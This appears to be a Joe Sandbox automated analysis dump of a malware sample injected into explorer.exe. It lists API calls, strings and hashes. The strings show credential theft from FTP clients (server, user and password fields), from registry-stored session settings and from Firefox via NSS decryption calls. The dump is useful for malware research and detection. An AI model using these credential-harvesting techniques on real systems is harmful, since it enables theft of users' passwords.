                                                                                            • Instruction Fuzzy Hash: FBD0C2B624930077D2002B52AC01F2B777A9F92B00F84800AF10091067C3685491AB3A
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,006E2893,00000000,00000000,00000000,?), ref: 006E1B82
                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 006E1B8F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateFileHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3498533004-0
                                                                                            • Opcode ID: fa9f194956b269c1dcb30235686c677d008ff02a81931193da588b8d368b1af4
                                                                                            • Instruction ID: 41b4e0877c888a6e965848e376cb738317b55f3e5a09e55c687cd4f23341ba15
                                                                                            • Opcode Fuzzy Hash: fa9f194956b269c1dcb30235686c677d008ff02a81931193da588b8d368b1af4
                                                                                            • Instruction Fuzzy Hash: 93D0C27120333032E57513363C1CEE72E0DDF036B2B048610B40DD81D0E2248C8381E0
                                                                                            APIs
                                                                                              • Part of subcall function 006E1162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 006E116F
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,006E1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2), ref: 006E1020
                                                                                            • RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1027
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$FreeProcessQueryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2580854192-0
                                                                                            • Opcode ID: c071f268bf81c43604724cb72f2e95230d46a965e3d648775dc71ab9fef88e5f
                                                                                            • Instruction ID: 46ed2ba341752e694365d2a43e6d5bfd5a53c902b5bbbdb5795ad5b7c38a71d1
                                                                                            • Opcode Fuzzy Hash: c071f268bf81c43604724cb72f2e95230d46a965e3d648775dc71ab9fef88e5f
                                                                                            • Instruction Fuzzy Hash: 77C08C710023B862D9A027A53C0CBCA2B1ACF0A223F008081B6019B242CAB98C4092A4
                                                                                            APIs
                                                                                            • GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 006E100A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1357844191-0
                                                                                            • Opcode ID: 70920286b436b901930686db3936875f3a8fc1b44731536fe55b029e8dfd6e58
                                                                                            • Instruction ID: 76735ebc0d0c4162b15f9817b5c381b37576026eee02975f33abd8d6089a69c2
                                                                                            • Opcode Fuzzy Hash: 70920286b436b901930686db3936875f3a8fc1b44731536fe55b029e8dfd6e58
                                                                                            • Instruction Fuzzy Hash: 41A001B5950218BBFE456BA4AE0EA1A3A28FB84703F10C544B646860A2EAA854049B39
                                                                                            APIs
                                                                                            • RtlZeroMemory.NTDLL(?,00000018), ref: 006E12B5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryZero
                                                                                            • String ID:
                                                                                            • API String ID: 816449071-0
                                                                                            • Opcode ID: 73fff808a7405f70e0adfe29e45490aa987174eddeb2751d28b4c408b45d7ad2
                                                                                            • Instruction ID: bff266b48fefe0c630a2d1b0af62c9bd6a87112a4dbd6bda712cef1c54e9d8e5
                                                                                            • Opcode Fuzzy Hash: 73fff808a7405f70e0adfe29e45490aa987174eddeb2751d28b4c408b45d7ad2
                                                                                            • Instruction Fuzzy Hash: CF11E6B5A01209AFEB10DFA5D984ABEB7BDFB09341B108029F945E7240D734DA01DB64
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(00000000,00000000,006E2C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 006E1BAA
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: e2efe7c1302bcf97ac431132d47693c5752250dbe6ec1189d0e3aff4d8ee3fdc
                                                                                            • Instruction ID: 9771573832aba41ec76042570189f468f428eca2afcab35a9781809d5e5f5032
                                                                                            • Opcode Fuzzy Hash: e2efe7c1302bcf97ac431132d47693c5752250dbe6ec1189d0e3aff4d8ee3fdc
                                                                                            • Instruction Fuzzy Hash: D9D0A933E13630829A68163938448D2A2816A0267531A03B4FC26FF2D4E238CC8262C0
                                                                                            APIs
                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 006E1684
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateGlobalStream
                                                                                            • String ID:
                                                                                            • API String ID: 2244384528-0
                                                                                            • Opcode ID: a0e81929d5e50fff4f12e4ec26d3993c506ec895342ecaa4c88d8afa692b1417
                                                                                            • Instruction ID: 3a56bee5620a5f57e51c8b712e4392a3f14b8f3beb944594e3b3e1fe256b2891
                                                                                            • Opcode Fuzzy Hash: a0e81929d5e50fff4f12e4ec26d3993c506ec895342ecaa4c88d8afa692b1417
                                                                                            • Instruction Fuzzy Hash: 59C01230121221AFE7201A208C09B8626D5AF1ABA2F064929A4819D080E2B808C08A90
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,006E158A), ref: 006E1056
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 05bc074f78993714a1c1bc807ddc6f14387db549982bdd491d9c0d8a2b6acf2f
                                                                                            • Instruction ID: a8ad047c59450eba897f180682c82bdc88a7dd561772a6c0a563e8191ce9318e
                                                                                            • Opcode Fuzzy Hash: 05bc074f78993714a1c1bc807ddc6f14387db549982bdd491d9c0d8a2b6acf2f
                                                                                            • Instruction Fuzzy Hash: 8FA001B07952007AFD695762AE1BF2529289740B02F108244B349680D055E86500852D
                                                                                            APIs
                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,006E4A5B,?,?,00000000,?,?,?,?,006E4B66,?), ref: 006E1065
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 1263568516-0
                                                                                            • Opcode ID: 929065f3e2bdb095b2cc42db64c72e5892c9c904f0e35c51527a2c9638fe0686
                                                                                            • Instruction ID: 21dfd0fe5bd314d5608565644816400ed58278f39ec8a04d53c8dcbfa00605bc
                                                                                            • Opcode Fuzzy Hash: 929065f3e2bdb095b2cc42db64c72e5892c9c904f0e35c51527a2c9638fe0686
                                                                                            • Instruction Fuzzy Hash: CCA0027069071476FDB557205D0AF0526246740B02F20C5447241A90D159E9E0448A1C
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 006E34C0
                                                                                              • Part of subcall function 006E33C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 006E3401
                                                                                            • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,006E37A8), ref: 006E34E9
                                                                                              • Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
                                                                                              • Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A
                                                                                            • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 006E351E
                                                                                            • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 006E3541
                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 006E3586
                                                                                            • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 006E358F
                                                                                            • lstrcmpiW.KERNEL32(00000000,File), ref: 006E35B6
                                                                                            • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 006E35DE
                                                                                            • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 006E35F6
                                                                                            • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 006E3606
                                                                                            • lstrcmpiW.KERNEL32(00000000,00000000), ref: 006E361E
                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 006E3631
                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 006E3658
                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 006E366B
                                                                                            • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 006E3681
                                                                                            • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 006E36AD
                                                                                            • CloseHandle.KERNEL32(?), ref: 006E36C0
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,006E37A8), ref: 006E36F5
                                                                                              • Part of subcall function 006E1C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 006E1CC0
                                                                                              • Part of subcall function 006E1C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 006E1CDA
                                                                                              • Part of subcall function 006E1C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 006E1CE6
                                                                                            • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,006E37A8), ref: 006E3707
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                                                                            • String ID: File
                                                                                            • API String ID: 3915112439-749574446
                                                                                            • Opcode ID: 0c2e5c26542a9848aecbf316cbba0d682acd48d6cad62509079594dc6a7722dc
                                                                                            • Instruction ID: f89c34db9878d42654fc7fc2ed1407161eae6a6a1ddba52350c657176e66e70e
                                                                                            • Opcode Fuzzy Hash: 0c2e5c26542a9848aecbf316cbba0d682acd48d6cad62509079594dc6a7722dc
                                                                                            • Instruction Fuzzy Hash: 1C61BB70205390BFE710AF32CC89F6B7BEAAB84751F00482CF946973A1DB35DA448B59
                                                                                            APIs
                                                                                            • memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 00734502
                                                                                            • memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 0073475F
                                                                                            • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 00734803
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmp$memcpy
                                                                                            • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                                                                            • API String ID: 231171946-1096842476
                                                                                            • Opcode ID: a82fa210f8cbe65db06c223542e46135903511ec57d4172825ba7b87502dd98f
                                                                                            • Instruction ID: 56189b224c6a5352f319822cd72017ad72dcacd26b51122aa7077b15e709d848
                                                                                            • Opcode Fuzzy Hash: a82fa210f8cbe65db06c223542e46135903511ec57d4172825ba7b87502dd98f
                                                                                            • Instruction Fuzzy Hash: 67C10070A083919BFB3CCE18849277AB7E1AB9A314F14092EE8D587253D73DFC458B56
                                                                                            APIs
                                                                                              • Part of subcall function 006E6AAA: memset.NTDLL ref: 006E6AC5
                                                                                            • memset.NTDLL ref: 00705F53
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset
                                                                                            • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                                            • API String ID: 2221118986-594550510
                                                                                            • Opcode ID: 9496b5a801818717d354a6476ab6ebfed498d952a861f0d9c50176ed6e24fe8b
                                                                                            • Instruction ID: 69b19b5e2bce637633379bdedde932b945d3c6676f05a711e3b531b17b4605c0
                                                                                            • Opcode Fuzzy Hash: 9496b5a801818717d354a6476ab6ebfed498d952a861f0d9c50176ed6e24fe8b
                                                                                            • Instruction Fuzzy Hash: CEC17070604742DFDB54DF25C490A2BB7E2BF88710F148A2DF84587282D739E962CB96
                                                                                            APIs
                                                                                            • CoCreateInstance.COMBASE(007362B0,00000000,00000001,007362A0,?), ref: 006E445F
                                                                                            • SysAllocString.OLEAUT32(?), ref: 006E44AA
                                                                                            • lstrcmpiW.KERNEL32(RecentServers,?), ref: 006E456E
                                                                                            • lstrcmpiW.KERNEL32(Servers,?), ref: 006E457D
                                                                                            • lstrcmpiW.KERNEL32(Settings,?), ref: 006E458C
                                                                                              • Part of subcall function 006E11E1: lstrlenW.KERNEL32(?,7591F360,00000000,?,00000000,?,006E46E3), ref: 006E11ED
                                                                                              • Part of subcall function 006E11E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 006E120F
                                                                                              • Part of subcall function 006E11E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 006E1231
                                                                                            • lstrcmpiW.KERNEL32(Server,?), ref: 006E45BE
                                                                                            • lstrcmpiW.KERNEL32(LastServer,?), ref: 006E45CD
                                                                                            • lstrcmpiW.KERNEL32(Host,?), ref: 006E4657
                                                                                            • lstrcmpiW.KERNEL32(Port,?), ref: 006E4679
                                                                                            • lstrcmpiW.KERNEL32(User,?), ref: 006E469F
                                                                                            • lstrcmpiW.KERNEL32(Pass,?), ref: 006E46C5
                                                                                            • wsprintfW.USER32 ref: 006E471E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                                                            • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                                                            • API String ID: 2230072276-1234691226
                                                                                            • Opcode ID: 55e60d25791b779836481ce357b8be105076c764788959624c07bd445c02bcff
                                                                                            • Instruction ID: 752b18beacb7af9d944e44b760ab654b86e174f783e1da89c01fc2622c6d34f9
                                                                                            • Opcode Fuzzy Hash: 55e60d25791b779836481ce357b8be105076c764788959624c07bd445c02bcff
                                                                                            • Instruction Fuzzy Hash: 1CB12971205342AFDB00DF65C884E6AB7EAEFC9745F00896CF5858B260DB71EC06CB62
                                                                                            APIs
                                                                                              • Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
                                                                                              • Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A
                                                                                              • Part of subcall function 006E1090: lstrlenW.KERNEL32(?,?,00000000,006E17E5), ref: 006E1097
                                                                                              • Part of subcall function 006E1090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 006E10A8
                                                                                              • Part of subcall function 006E19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,006E2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 006E19C4
                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 006E2503
                                                                                            • SetCurrentDirectoryW.KERNEL32(00000000), ref: 006E250A
                                                                                            • LoadLibraryW.KERNEL32(00000000), ref: 006E2563
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006E2570
                                                                                            • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 006E2591
                                                                                            • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 006E259E
                                                                                            • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 006E25AB
                                                                                            • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 006E25B8
                                                                                            • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 006E25C5
                                                                                            • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 006E25D2
                                                                                            • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 006E25DF
                                                                                              • Part of subcall function 006E190B: lstrlen.KERNEL32(?,?,?,?,00000000,006E2783), ref: 006E192B
                                                                                              • Part of subcall function 006E190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,006E2783), ref: 006E1930
                                                                                              • Part of subcall function 006E190B: lstrcat.KERNEL32(00000000,?), ref: 006E1946
                                                                                              • Part of subcall function 006E190B: lstrcat.KERNEL32(00000000,00000000), ref: 006E194A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                                                            • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                                                            • API String ID: 3366569387-3272982511
                                                                                            • Opcode ID: c301cdd37c39899d19b31d6cd78933088f9815a4e9a0b240d17b9c0d9b5fd72f
                                                                                            • Instruction ID: fc70fd4dc01bb81dad43a34b533080e241536133dc265b7a7befb71fe51581e7
                                                                                            • Opcode Fuzzy Hash: c301cdd37c39899d19b31d6cd78933088f9815a4e9a0b240d17b9c0d9b5fd72f
                                                                                            • Instruction Fuzzy Hash: 30411535A033829BDB14BB369C7546E3BEBAB82745740812EE84197352DF3C8C4B9B59
                                                                                            APIs
                                                                                              • Part of subcall function 006E5BF5: memset.NTDLL ref: 006E5C07
                                                                                            • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 006E60E1
                                                                                            • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 006E60EC
                                                                                            • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 006E6113
                                                                                            • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 006E618E
                                                                                            • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 006E61B5
                                                                                            • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 006E61C1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _alldiv$_allrem$memset
                                                                                            • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                                            • API String ID: 2557048445-1989508764
                                                                                            • Opcode ID: 425bfb2d002144dfe644435cd9f462f588aaf14e7576333688ff0f83492614ac
                                                                                            • Instruction ID: 6da1e28fec3dcdb8bde67651e343138389a8209e9db68674f50a5fcb3bf78e00
                                                                                            • Opcode Fuzzy Hash: 425bfb2d002144dfe644435cd9f462f588aaf14e7576333688ff0f83492614ac
                                                                                            • Instruction Fuzzy Hash: 27B1BFB29097C29FD7359E26CC88B7A7FC7FB90388F24054DF583962D2E620CE108695
                                                                                            APIs
                                                                                            • memcmp.NTDLL(0073637A,BINARY,00000007), ref: 006FD324
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmp
                                                                                            • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                                            • API String ID: 1475443563-3683840195
                                                                                            • Opcode ID: f51fc25ff32f6cd88df5f63a6e63c489e9a2954422e8fb2e8022ccc7fd9ba1a2
                                                                                            • Instruction ID: e1fecfaddbf6c7103f3026cde73cf03c41e6f48f0ac518c353333e77b3447e05
                                                                                            • Opcode Fuzzy Hash: f51fc25ff32f6cd88df5f63a6e63c489e9a2954422e8fb2e8022ccc7fd9ba1a2
                                                                                            • Instruction Fuzzy Hash: 29510372608308ABE721DF55CC41A7A73E7AF46300F140869FA918B242D775FD16CB93
                                                                                            APIs
                                                                                              • Part of subcall function 006E19E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1A1E
                                                                                              • Part of subcall function 006E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 006E1A3C
                                                                                              • Part of subcall function 006E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 006E1A75
                                                                                              • Part of subcall function 006E19E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1A98
                                                                                              • Part of subcall function 006E482C: lstrlenW.KERNEL32(?), ref: 006E4845
                                                                                              • Part of subcall function 006E482C: lstrlenW.KERNEL32(?), ref: 006E488F
                                                                                              • Part of subcall function 006E482C: lstrlenW.KERNEL32(?), ref: 006E4897
                                                                                            • wsprintfW.USER32 ref: 006E49A7
                                                                                            • wsprintfW.USER32 ref: 006E49B9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                                                            • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                                                            • API String ID: 2889301010-4273187114
                                                                                            • Opcode ID: 7331516abf0932cc218a9a96ceb539fa0ea7201955e464ff00711eec8e923da7
                                                                                            • Instruction ID: 6c2c45b3addf72ecff6546582cca52bc63ade4784a4458aec1d6fbfb0a58c91a
                                                                                            • Opcode Fuzzy Hash: 7331516abf0932cc218a9a96ceb539fa0ea7201955e464ff00711eec8e923da7
                                                                                            • Instruction Fuzzy Hash: 9A31E2757063846BD710AB77884182BB7EFEFCA744B05891DB045AB342DEB2DD0187A5
                                                                                            APIs
                                                                                            • memcpy.NTDLL(?,?,?,?,00000000), ref: 006EFB32
                                                                                            • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 006EFB4D
                                                                                            • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 006EFB60
                                                                                            • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 006EFB95
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: -journal$-wal$immutable$nolock
                                                                                            • API String ID: 3510742995-3408036318
                                                                                            • Opcode ID: d2b15c290399097151cd02ad6831562b5d78c3e2acf78ea6a1d6d15a767ea57e
                                                                                            • Instruction ID: 0f4ef44b1d53deba1add63c37fafc8b28ee81f099c0767b11724034ab48bd919
                                                                                            • Opcode Fuzzy Hash: d2b15c290399097151cd02ad6831562b5d78c3e2acf78ea6a1d6d15a767ea57e
                                                                                            • Instruction Fuzzy Hash: BFD1E3B16093818FDB14DF29C881B5BBBE2AF95310F18457DF8998B382DB75D805CB52
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: %$-x0$NaN
                                                                                            • API String ID: 0-62881354
                                                                                            • Opcode ID: e0a6134bcd557dd39cbad41fcaac0ae5cc3eeed551eff9e6871bb74401e41b20
                                                                                            • Instruction ID: a134d537289ad810c9f8672f7c01e4b2adbc0af138b0ec63c8dd18778dafe95e
                                                                                            • Opcode Fuzzy Hash: e0a6134bcd557dd39cbad41fcaac0ae5cc3eeed551eff9e6871bb74401e41b20
                                                                                            • Instruction Fuzzy Hash: BFD1F57060E3D28FD7258E2AC4947AABBE3AF95344F28485DF8C187392D664CD46D782
                                                                                            APIs
                                                                                            • GetHGlobalFromStream.COMBASE(?,?), ref: 006E18A7
                                                                                            • GlobalLock.KERNEL32(WKn), ref: 006E18B6
                                                                                            • GlobalUnlock.KERNEL32(?), ref: 006E18F4
                                                                                              • Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
                                                                                              • Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A
                                                                                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 006E18E8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
                                                                                            • String ID: WKn$WKn
                                                                                            • API String ID: 1688112647-3349668105
                                                                                            • Opcode ID: ad4f917900dfe66d5b2753c7700d40e6c77de9714fa6e55116573476ef703178
                                                                                            • Instruction ID: f7baee02657895591a1dfaaf22771b937e2ed1bea0f7b93c142f9792bb4b09b5
